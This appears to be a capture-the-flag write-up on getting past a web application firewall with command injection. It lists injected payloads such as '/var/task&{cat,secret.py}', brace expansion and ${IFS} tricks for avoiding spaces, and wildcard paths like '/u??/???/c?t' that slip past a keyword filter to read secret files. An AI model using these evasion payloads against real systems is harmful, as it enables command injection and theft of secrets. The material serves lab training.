WAF
See Also:
Char Evasion 'spaces'
{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt
/&pwd/&pwd
/var/task&{cat,secret.py}
{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}
Found this hiding behind ... instead of . ..
{/var/task/...,-la}WAF Wars
The bash shell allows wildcards.
These can be helpful to run commands that may be blocked by the WAF.
There are many functions that can manipulate text.
Try looking at the man pages for iconv or cut.
ls -la /secrets
$cmd = "ls -la /secrets" && $output = shell_exec($cmd);
$c=p $m=w $d=d && $output = shell_exec($c$m$d);
ls -la /secrets
/???/?s
/bin/ps
/???/?s /s?????s
"flag","f","l","a","g"
/???/??t
$egress_ruleset = array("BLAB","{","}",
"flag","secret","password","ssn","confidential");
file
flag
password
pins
ssn
/???/??t ./pins
/???/c?t
/???/?s ..ls works
/???/e??o hi ..echo works!!!
/???/c?t /s?????s/
/u??/???/?s ..might be 'ls' ?
/u??/???/c?t ..might be 'cat' ?
/u??/???/c?t -c1 /s????ts/????
Answer:
cut -b8-30
/u??/???/c?t -b1-5 /s????ts/????
/u??/???/c?t -b8-30 /s????ts/????
FLAG{waf_3vision_w1n}Last updated
Was this helpful?